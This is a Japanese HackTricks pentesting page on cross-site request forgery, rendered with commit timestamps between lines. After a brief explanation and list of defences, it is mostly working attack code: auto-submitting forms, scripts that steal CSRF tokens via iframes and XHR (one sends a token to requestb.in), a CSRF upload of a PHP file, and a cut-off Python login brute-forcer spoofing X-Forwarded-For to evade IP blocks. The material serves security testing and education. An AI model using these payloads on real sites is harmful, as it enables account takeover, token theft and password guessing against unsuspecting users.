2024-02-05 20:22:21 +00:00
# CSRF( Cross Site Request Forgery)
2022-04-28 16:01:33 +00:00
< details >
2024-02-23 16:45:40 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > を使用して、< strong > ゼロからヒーローまでAWSハッキングを学ぶ< / strong > ! < / summary >
2022-04-28 16:01:33 +00:00
2024-02-05 20:22:21 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-02-09 08:23:12 +00:00
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
2024-02-23 16:45:40 +00:00
- [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com )を入手する
- [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **Discordグループ**に参加する💬( https://discord.gg/hRep4RUj7f) または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )をフォローする。
- **HackTricks**( https://github.com/carlospolop/hacktricks) および**HackTricks Cloud**( https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
2022-04-28 16:01:33 +00:00
2023-12-31 05:23:56 +00:00
< / details >
2022-10-27 23:22:18 +00:00
2024-02-23 16:45:40 +00:00
< figure > < img src = "../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-02-23 16:45:40 +00:00
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るために、[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)サーバーに参加しましょう!
2023-02-27 09:28:45 +00:00
2023-12-31 05:23:56 +00:00
**ハッキングの洞察**\
2024-02-23 16:45:40 +00:00
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加する
2023-02-27 09:28:45 +00:00
2024-02-23 16:45:40 +00:00
**リアルタイムのハックニュース**\
リアルタイムのニュースと洞察を通じて、ハッキングの世界を最新の状態に保つ
2023-07-14 16:20:47 +00:00
2024-02-09 08:23:12 +00:00
**最新の発表**\
2024-02-23 16:45:40 +00:00
最新のバグバウンティの開始や重要なプラットフォームの更新に関する情報を把握する
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
**Discord**( https://discord.com/invite/N3FrSbmwdy) に参加して、今日からトップハッカーと協力しましょう!
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
## Cross-Site Request Forgery( CSRF) の説明
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
**Cross-Site Request Forgery( CSRF) **は、Webアプリケーションで見つかるセキュリティ脆弱性の一種です。これにより、攻撃者は認証されたセッションを悪用して無防備なユーザーの代わりにアクションを実行できます。攻撃は、被害者のプラットフォームにログインしているユーザーが悪意のあるサイトを訪れたときに実行されます。このサイトは、JavaScriptの実行、フォームの送信、画像の取得などの方法を使用して、被害者のアカウントにリクエストをトリガーします。
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
### CSRF攻撃の前提条件
2024-02-23 16:45:40 +00:00
2024-02-05 20:22:21 +00:00
CSRF脆弱性を悪用するには、いくつかの条件を満たす必要があります:
2020-07-15 15:43:14 +00:00
2024-02-09 08:23:12 +00:00
1. **価値のあるアクションの特定** :攻撃者は、ユーザーのパスワードの変更、メールの変更、特権の昇格など、悪用する価値のあるアクションを見つける必要があります。
2024-02-23 16:45:40 +00:00
2. **セッション管理** : ユーザーのセッションは、クッキーまたはHTTPベーシック認証ヘッダーを介してのみ管理される必要があります。他のヘッダーはこの目的のために操作できないためです。
3. **予測不可能なパラメーターの不在** :攻撃を防ぐために、リクエストに予測不可能なパラメーターが含まれていてはいけません。
### クイックチェック
**Burpでリクエストをキャプチャ**してCSRF保護を確認し、ブラウザからテストするには**Copy as fetch**をクリックしてリクエストを確認できます:
< figure > < img src = "../.gitbook/assets/image.png" alt = "" > < figcaption > < / figcaption > < / figure >
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
### CSRFに対する防御
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
CSRF攻撃に対抗するために、いくつかの対策を実装できます:
- [**SameSite cookies** ](hacking-with-cookies/#samesite ):この属性は、ブラウザがクロスサイトリクエストと一緒にクッキーを送信しないようにします。[SameSite cookiesについて詳しく](hacking-with-cookies/#samesite)。
- [**Cross-origin resource sharing** ](cors-bypass.md ): 被害者サイトのCORSポリシーは、攻撃が被害者サイトからの応答を読み取ることを必要とする場合など、攻撃の実現可能性に影響を与える可能性があります。[CORSバイパスについて学ぶ](cors-bypass.md)。
- **ユーザーの検証**: ユーザーの意図を確認するために、パスワードの入力やCAPTCHAの解決を求めることができます。
- **リファラーまたはOriginヘッダーの確認**: これらのヘッダーを検証することで、信頼されたソースからのリクエストであることを確認できます。ただし、URLの慎重な作成により、実装が不十分なチェックをバイパスすることができます。例:
- `http://mal.net?orig=http://example.com` ( URLが信頼されたURLで終わる)
- `http://example.com.mal.net` ( URLが信頼されたURLで始まる)
- **パラメーター名の変更**: POSTまたはGETリクエストのパラメーター名を変更することで、自動化された攻撃を防ぐのに役立ちます。
- **CSRFトークン**: 各セッションに一意のCSRFトークンを組み込み、後続のリクエストでこのトークンを要求することで、CSRFのリスクを著しく軽減できます。トークンの効果を向上させるために、CORSの強制を行うことができます。
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
これらの防御策を理解し、実装することは、Webアプリケーションのセキュリティと完全性を維持するために重要です。
2020-07-15 15:43:14 +00:00
2023-12-31 05:23:56 +00:00
## 防御のバイパス
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### POSTからGETへ
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
悪用したいフォームが**CSRFトークンを含むPOSTリクエストを送信するように準備されているかもしれませんが**、**GET**も**有効**であるかどうか、GETリクエストを送信したときに**CSRFトークンが引き続き検証されている**かどうかを**確認**する必要があります。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### トークンの欠如
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
アプリケーションは、トークンが存在する場合にのみトークンを検証するメカニズムを実装する場合があります。ただし、トークンが欠落している場合に検証が完全にスキップされると、脆弱性が発生します。攻撃者は、トークンを運ぶパラメーターだけでなく、その値を削除することで、検証プロセスを回避し、効果的にCross-Site Request Forgery( CSRF) 攻撃を実行できます。
2024-02-05 20:22:21 +00:00
### CSRFトークンがユーザーセッションに紐付いていない
2024-02-23 16:45:40 +00:00
CSRFトークンをユーザーセッションに紐付けないアプリケーションは、重大な**セキュリティリスク**を示します。これらのシステムは、各トークンが開始セッションにバインドされていることを確認するのではなく、トークンを**グローバルプール**に対して検証します。
2024-02-05 20:22:21 +00:00
2024-02-09 08:23:12 +00:00
攻撃者がこれをどのように悪用するか:
2023-12-31 05:23:56 +00:00
2024-02-23 16:45:40 +00:00
1. 自分のアカウントを使用して**認証**する。
2. グローバルプールから有効なCSRFトークンを**取得**する。
3. このトークンを被害者に対するCSRF攻撃に**使用**する。
2023-12-31 05:23:56 +00:00
2024-02-23 16:45:40 +00:00
この脆弱性により、攻撃者は被害者を代表して不正なリクエストを行い、アプリケーションの**不適切なトークン検証メカニズム**を悪用できます。
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
### メソッドバイパス
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
リクエストが**「奇妙な」メソッド**を使用している場合、**メソッドオーバーライド機能**が機能しているかどうかを確認してください。たとえば、**PUT**メソッドを使用している場合、**POST**メソッドを試して、_https://example.com/my/dear/api/val/num?**\_method=PUT**_を**送信**できます。
2023-12-31 05:23:56 +00:00
2024-02-09 08:23:12 +00:00
これは、**POSTリクエスト内に\_methodパラメーターを送信**するか、**ヘッダー**を使用することでも機能する可能性があります:
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
- _X-HTTP-Method_
- _X-HTTP-Method-Override_
- _X-Method-Override_
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
### カスタムヘッダートークンバイパス
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
リクエストが**CSRF保護手法としてカスタムヘッダーにトークンを追加**している場合、次のようにします:
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
- カスタムトークンとヘッダーなしでリクエストをテストします。
- 同じ長さの異なるトークンを使用して、リクエストをテストします。
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
### CSRFトークンがクッキーによって検証されている
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
アプリケーションは、リクエストパラメーターとクッキーの両方にトークンを複製するか、CSRFクッキーを設定し、バックエンドで送信されたトークンがクッキーと一致するかどうかを検証することで、CSRF保護を実装する場合があります。アプリケーションは、リクエスト内のトークンがクッキーの値と一致するかどうかを確認することでリクエストを検証します。
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
ただし、この方法は、ウェブサイトにCRLF脆弱性などの欠陥がある場合、攻撃者が被害者のブラウザにCSRFクッキーを設定できるようにする欠陥があるため、CSRF攻撃に対して脆弱です。攻撃者は、クッキーを設定する欺瞞的な画像を読み込んでから、CSRF攻撃を開始することで、これを悪用できます。
2021-11-30 16:46:07 +00:00
2024-02-05 20:22:21 +00:00
以下は、攻撃がどのように構築されるかの例です:
2021-11-30 16:46:07 +00:00
```html
< html >
2024-02-05 20:22:21 +00:00
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
2023-07-07 23:42:27 +00:00
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
2024-02-05 20:22:21 +00:00
< form action = "https://example.com/my-account/change-email" method = "POST" >
2023-07-07 23:42:27 +00:00
< input type = "hidden" name = "email" value = "asd@asd.asd" / >
< input type = "hidden" name = "csrf" value = "tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" / >
< input type = "submit" value = "Submit request" / >
< / form >
2024-02-05 20:22:21 +00:00
< img src = "https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror = "document.forms[0].submit();" / >
2023-07-07 23:42:27 +00:00
< / body >
2021-11-30 16:46:07 +00:00
< / html >
2024-02-05 20:22:21 +00:00
2021-11-30 16:46:07 +00:00
```
{% hint style="info" %}
2024-02-23 16:45:40 +00:00
**csrf トークンがセッションクッキーと関連している場合、この攻撃は機能しません**。なぜなら、被害者に自分のセッションを設定する必要があり、その結果、自分自身を攻撃することになります。
2021-11-30 16:46:07 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
### Content-Type の変更
2020-08-10 09:56:57 +00:00
2024-02-23 16:45:40 +00:00
[**こちら** ](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests )によると、**POST** メソッドを使用して **プリフライト** リクエストを回避するために、次の Content-Type 値が許可されています:
2021-05-29 20:00:49 +00:00
2024-02-05 20:22:21 +00:00
- **`application/x-www-form-urlencoded`**
- **`multipart/form-data`**
- **`text/plain`**
2021-05-29 20:00:49 +00:00
2024-02-05 20:22:21 +00:00
ただし、使用される **Content-Type** に応じて **サーバーのロジックが異なる場合** があるため、上記の値や ** `application/json` **、**`text/xml`**、**`application/xml`** などの他の値を試す必要があります。
2022-04-22 08:32:18 +00:00
2024-02-09 08:23:12 +00:00
例([こちら](https://brycec.me/posts/corctf\_2021\_challenges)から): JSON データを text/plain として送信する場合:
2022-04-22 08:32:18 +00:00
```html
< html >
2023-07-07 23:42:27 +00:00
< body >
< form id = "form" method = "post" action = "https://phpme.be.ax/" enctype = "text/plain" >
< input name = '{"garbageeeee":"' value = '", "yep": "yep yep yep", "url": "https://webhook/"}' >
< / form >
< script >
form.submit();
< / script >
< / body >
2022-04-22 08:32:18 +00:00
< / html >
```
2024-02-23 16:45:40 +00:00
### JSONデータのプリフライトリクエストのバイパス
2021-10-05 10:00:17 +00:00
2024-02-23 16:45:40 +00:00
JSONデータをPOSTリクエストで送信しようとする際、HTMLフォームで`Content-Type: application/json`を使用することは直接はできません。同様に、このコンテンツタイプを送信するために`XMLHttpRequest`を使用すると、プリフライトリクエストが開始されます。それでも、この制限を回避し、サーバーがContent-Typeに関係なくJSONデータを処理するかどうかを確認するための戦略があります:
2022-02-21 15:48:28 +00:00
2024-02-23 16:45:40 +00:00
1. **代替コンテンツタイプの使用** : フォーム内で`enctype="text/plain"`を設定して、`Content-Type: text/plain`または`Content-Type: application/x-www-form-urlencoded`を使用します。この方法は、バックエンドがContent-Typeに関係なくデータを利用するかどうかをテストします。
2. **コンテンツタイプの変更** : サーバーがコンテンツをJSONとして認識することを確認しながら、プリフライトリクエストを回避するために、データを`Content-Type: text/plain; application/json`で送信できます。これによりプリフライトリクエストがトリガーされませんが、サーバーが`application/json`を受け入れるように構成されている場合は正しく処理される可能性があります。
3. **SWF Flashファイルの利用** : より一般的ではないが実現可能な方法として、このような制限をバイパスするためにSWF Flashファイルを使用する方法があります。このテクニックの詳細については、[この投稿](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937)を参照してください。
2021-10-05 10:00:17 +00:00
2024-02-05 20:22:21 +00:00
### リファラー/オリジンチェックのバイパス
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
**リファラーヘッダーの回避**
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
アプリケーションは、'Referer'ヘッダーが存在する場合にのみ検証する場合があります。ブラウザがこのヘッダーを送信しないようにするには、次のHTMLメタタグを使用できます:
```xml
2020-07-15 15:43:14 +00:00
< meta name = "referrer" content = "never" >
```
2024-02-23 16:45:40 +00:00
これにより、「Referer」ヘッダーが省略され、一部のアプリケーションでの検証チェックがバイパスされる可能性があります。
2024-02-05 20:22:21 +00:00
2023-12-31 05:23:56 +00:00
**Regexpバイパス**
2020-07-15 15:43:14 +00:00
2022-02-13 12:30:13 +00:00
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md ](ssrf-server-side-request-forgery/url-format-bypass.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-02-09 08:23:12 +00:00
リファラが送信するURL内のサーバーのドメイン名を設定するには、次のようにします:
2021-11-30 16:46:07 +00:00
```html
< html >
2023-07-07 23:42:27 +00:00
<!-- Referrer policy needed to send the qury parameter in the referrer -->
< head > < meta name = "referrer" content = "unsafe-url" > < / head >
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
< form action = "https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method = "POST" >
< input type = "hidden" name = "email" value = "asd@asd.asd" / >
< input type = "submit" value = "Submit request" / >
< / form >
< script >
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
< / script >
< / body >
2021-11-30 16:46:07 +00:00
< / html >
```
2024-02-05 20:22:21 +00:00
### **HEADメソッドバイパス**
2023-07-14 16:20:47 +00:00
2024-02-05 20:22:21 +00:00
[**このCTF解説** ](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution )の最初の部分では、[Oakのソースコード](https://github.com/oakserver/oak/blob/main/router.ts#L281)が説明されており、ルーターは**HEADリクエストをGETリクエストとして処理**し、レスポンスボディはない - これはOakに固有のものではない一般的な回避策です。HEADリクエストを処理する特定のハンドラーの代わりに、それらは単純に**GETハンドラーに渡されますが、アプリはレスポンスボディを削除するだけ**です。
2023-07-14 16:20:47 +00:00
2024-02-05 20:22:21 +00:00
したがって、GETリクエストが制限されている場合、**GETリクエストとして処理されるHEADリクエストを送信**することができます。
2022-10-27 23:22:18 +00:00
2024-02-05 20:22:21 +00:00
## **攻撃例**
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
### **CSRFトークンの外部流出**
2020-07-15 15:43:14 +00:00
2024-02-23 16:45:40 +00:00
もし**CSRFトークン**が**防御として使用されている**場合、[**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens)脆弱性や[**Dangling Markup**](dangling-markup-html-scriptless-injection/)脆弱性を悪用して**それを外部流出**することができます。
2020-07-15 15:43:14 +00:00
2023-12-31 05:23:56 +00:00
### **HTMLタグを使用したGET**
2024-02-05 20:22:21 +00:00
```xml
2021-10-05 10:00:17 +00:00
< img src = "http://google.es?param=VALUE" style = "display:none" / >
2020-07-15 15:43:14 +00:00
< h1 > 404 - Page not found< / h1 >
The URL you are requesting is no longer available
```
2024-02-05 20:22:21 +00:00
他のHTML5タグは、自動的にGETリクエストを送信するために使用できます:
```html
< iframe src = "..." > < / iframe >
< script src = "..." > < / script >
< img src = "..." alt = "" >
< embed src = "..." >
< audio src = "..." >
< video src = "..." >
< source src = "..." type = "..." >
< video poster = "..." >
< link rel = "stylesheet" href = "..." >
< object data = "..." >
< body background = "..." >
< div style = "background: url('...');" > < / div >
< style >
body { background: url('...'); }
< / style >
< bgsound src = "..." >
< track src = "..." kind = "subtitles" >
< input type = "image" src = "..." alt = "Submit Button" >
```
### フォームGETリクエスト
```html
2020-07-15 15:43:14 +00:00
< html >
2023-07-07 23:42:27 +00:00
<!-- CSRF PoC - generated by Burp Suite Professional -->
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
< form method = "GET" action = "https://victim.net/email/change-email" >
< input type = "hidden" name = "email" value = "some@email.com" / >
< input type = "submit" value = "Submit request" / >
< / form >
< script >
document.forms[0].submit();
< / script >
< / body >
2020-07-15 15:43:14 +00:00
< / html >
```
2023-12-31 05:23:56 +00:00
### フォームPOSTリクエスト
2024-02-05 20:22:21 +00:00
```html
2020-07-15 15:43:14 +00:00
< html >
2023-07-07 23:42:27 +00:00
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
< form method = "POST" action = "https://victim.net/email/change-email" id = "csrfform" >
< input type = "hidden" name = "email" value = "some@email.com" autofocus onfocus = "csrfform.submit();" / > <!-- Way 1 to autosubmit -->
< input type = "submit" value = "Submit request" / >
< img src = x onerror = "csrfform.submit();" / > <!-- Way 2 to autosubmit -->
< / form >
< script >
document.forms[0].submit(); //Way 3 to autosubmit
< / script >
< / body >
2020-07-15 15:43:14 +00:00
< / html >
2021-06-04 23:20:57 +00:00
```
2024-02-05 20:22:21 +00:00
### iframeを通じたフォームPOSTリクエスト
```html
2023-07-07 23:42:27 +00:00
<!--
The request is sent through the iframe withuot reloading the page
2021-06-04 23:20:57 +00:00
-->
< html >
2023-07-07 23:42:27 +00:00
< body >
< iframe style = "display:none" name = "csrfframe" > < / iframe >
< form method = "POST" action = "/change-email" id = "csrfform" target = "csrfframe" >
< input type = "hidden" name = "email" value = "some@email.com" autofocus onfocus = "csrfform.submit();" / >
< input type = "submit" value = "Submit request" / >
< / form >
< script >
document.forms[0].submit();
< / script >
< / body >
2021-06-04 23:20:57 +00:00
< / html >
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:22:21 +00:00
### **Ajax POST リクエスト**
```html
2020-07-15 15:43:14 +00:00
< script >
var xh;
if (window.XMLHttpRequest)
2023-07-07 23:42:27 +00:00
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
2020-07-15 15:43:14 +00:00
else
2023-07-07 23:42:27 +00:00
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
2021-06-05 01:10:15 +00:00
xh.withCredentials = true;
2020-07-15 15:43:14 +00:00
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
< / script >
2021-06-05 01:10:15 +00:00
< script >
//JQuery version
$.ajax({
2023-07-07 23:42:27 +00:00
type: "POST",
url: "https://google.com",
data: "param=value& param2=value2"
2021-06-05 01:10:15 +00:00
})
< / script >
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:22:21 +00:00
### multipart/form-data POST リクエスト
2020-07-15 15:43:14 +00:00
```javascript
myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?> "], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
2023-07-07 23:42:27 +00:00
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
2020-07-15 15:43:14 +00:00
});
```
2024-02-05 20:22:21 +00:00
### multipart/form-data POST リクエスト v2
2020-07-15 15:43:14 +00:00
```javascript
2024-02-05 20:22:21 +00:00
// https://www.exploit-db.com/exploits/20009
2020-07-15 15:43:14 +00:00
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
2021-06-05 01:10:15 +00:00
xhr.withCredentials = true;
2020-07-15 15:43:14 +00:00
xhr.open("POST", url, true);
// MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";
//xhr.send(body);
xhr.sendAsBinary(body);
```
2024-02-05 20:22:21 +00:00
### iframe内からのフォームPOSTリクエスト
```html
2020-07-15 15:43:14 +00:00
< -- ! expl . html -- >
< body onload = "envia()" >
< form method = "POST" id = "formulario" action = "http://aplicacion.example.com/cambia_pwd.php" >
< input type = "text" id = "pwd" name = "pwd" value = "otra nueva" >
< / form >
< body >
< script >
function envia(){document.getElementById("formulario").submit();}
< / script >
<!-- public.html -->
< iframe src = "2-1.html" style = "position:absolute;top:-5000" >
< / iframe >
< h1 > Sitio bajo mantenimiento. Disculpe las molestias< / h1 >
```
2024-02-05 20:22:21 +00:00
### **CSRF トークンを盗み、POST リクエストを送信する**
2020-07-15 15:43:14 +00:00
```javascript
function submitFormWithTokenJS(token) {
2023-07-07 23:42:27 +00:00
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;
// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE & & xhr.status === 200) {
//console.log(xhr.responseText);
}
}
xhr.send("token=" + token + "&otherparama=heyyyy");
2020-07-15 15:43:14 +00:00
}
function getTokenJS() {
2023-07-07 23:42:27 +00:00
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE & & xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
2020-07-15 15:43:14 +00:00
}
var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();
```
2024-02-23 16:45:40 +00:00
### **CSRF トークンを盗み、iframe、フォーム、およびAjaxを使用してPOSTリクエストを送信する**
2024-02-05 20:22:21 +00:00
```html
2020-07-15 15:43:14 +00:00
< form id = "form1" action = "http://google.com?param=VALUE" method = "post" enctype = "multipart/form-data" >
< input type = "text" name = "username" value = "AA" >
< input type = "checkbox" name = "status" checked = "checked" >
< input id = "token" type = "hidden" name = "token" value = "" / >
< / form >
< script type = "text/javascript" >
function f1(){
2023-07-07 23:42:27 +00:00
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;
document.getElementById("token").value=t;
document.getElementById("form1").submit();
2020-07-15 15:43:14 +00:00
}
2023-07-07 23:42:27 +00:00
< / script >
2020-07-15 15:43:14 +00:00
< iframe id = "i1" style = "display:none" src = "http://google.com?param=VALUE" onload = "javascript:f1();" > < / iframe >
```
2024-02-23 16:45:40 +00:00
### **CSRFトークンを盗み、iframeとフォームを使用してPOSTリクエストを送信する**
2024-02-05 20:22:21 +00:00
```html
2020-07-15 15:43:14 +00:00
< iframe id = "iframe" src = "http://google.com?param=VALUE" width = "500" height = "500" onload = "read()" > < / iframe >
2023-07-07 23:42:27 +00:00
< script >
2020-07-15 15:43:14 +00:00
function read()
{
2023-07-07 23:42:27 +00:00
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('< form width = "0" height = "0" method = "post" action = "http://www.yoursebsite.com/check.php" enctype = "multipart/form-data" > ');
document.writeln('< input id = "username" type = "text" name = "username" value = "' + name + '" / > < br / > ');
document.writeln('< input id = "token" type = "hidden" name = "token" value = "' + token + '" / > ');
document.writeln('< input type = "submit" name = "submit" value = "Submit" / > < br / > ');
document.writeln('< / form > ');
document.forms[0].submit.click();
2020-07-15 15:43:14 +00:00
}
< / script >
```
2024-02-05 20:22:21 +00:00
### **トークンを盗み、2つのiframeを使用して送信する**
```html
2020-07-15 15:43:14 +00:00
< script >
var token;
function readframe1(){
2023-07-07 23:42:27 +00:00
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
2020-07-15 15:43:14 +00:00
}
function loadframe2(){
2023-07-07 23:42:27 +00:00
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
2020-07-15 15:43:14 +00:00
}
< / script >
2023-07-07 23:42:27 +00:00
< iframe id = "frame1" name = "frame1" src = "http://google.com?param=VALUE" onload = "readframe1()"
2020-07-15 15:43:14 +00:00
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800">< / iframe >
2023-07-07 23:42:27 +00:00
< iframe id = "frame2" name = "frame2"
2020-07-15 15:43:14 +00:00
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800">< / iframe >
< body onload = "document.forms[0].submit()" >
< form id = "bypass" name " bypass " method = "POST" target = "frame2" action = "http://google.com?param=VALUE" enctype = "multipart/form-data" >
2023-07-07 23:42:27 +00:00
< input type = "text" name = "username" value = "z" >
< input type = "checkbox" name = "status" checked = "" >
< input id = "token" type = "hidden" name = "token" value = "0000" / >
< button type = "submit" > Submit< / button >
2020-07-15 15:43:14 +00:00
< / form >
```
2024-02-23 16:45:40 +00:00
### **Ajaxを使用してCSRFトークンを盗み、フォームを使ってポストを送信する**
2024-02-05 20:22:21 +00:00
```html
2020-07-15 15:43:14 +00:00
< body onload = "getData()" >
< form id = "form" action = "http://google.com?param=VALUE" method = "POST" enctype = "multipart/form-data" >
2023-07-07 23:42:27 +00:00
< input type = "hidden" name = "username" value = "root" / >
< input type = "hidden" name = "status" value = "on" / >
< input type = "hidden" id = "findtoken" name = "token" value = "" / >
< input type = "submit" value = "valider" / >
2020-07-15 15:43:14 +00:00
< / form >
< script >
var x = new XMLHttpRequest();
function getData() {
2023-07-07 23:42:27 +00:00
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
2020-07-15 15:43:14 +00:00
}
x.onreadystatechange = function() {
2023-07-07 23:42:27 +00:00
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
2020-07-15 15:43:14 +00:00
}
< / script >
```
2024-02-05 20:22:21 +00:00
### Socket.IOを使用したCSRF
```html
2020-08-06 20:38:54 +00:00
< script src = "https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js" > < / script >
< script >
let socket = io('http://six.jh2i.com:50022/test');
const username = 'admin'
socket.on('connect', () => {
2023-07-07 23:42:27 +00:00
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})
2020-08-06 20:38:54 +00:00
});
< / script >
```
2024-02-05 20:22:21 +00:00
## CSRFログインブルートフォース
2020-08-06 20:38:54 +00:00
2024-02-05 20:22:21 +00:00
このコードは、CSRFトークンを使用してログインフォームをブルートフォースするために使用できます( 可能なIPブラックリストをバイパスするためにX-Forwarded-Forヘッダーも使用しています) 。
2020-11-06 18:22:38 +00:00
```python
import request
import re
import random
URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"
def init_session():
2023-07-07 23:42:27 +00:00
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie
2020-11-06 18:22:38 +00:00
def login(user, password):
2023-07-07 23:42:27 +00:00
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
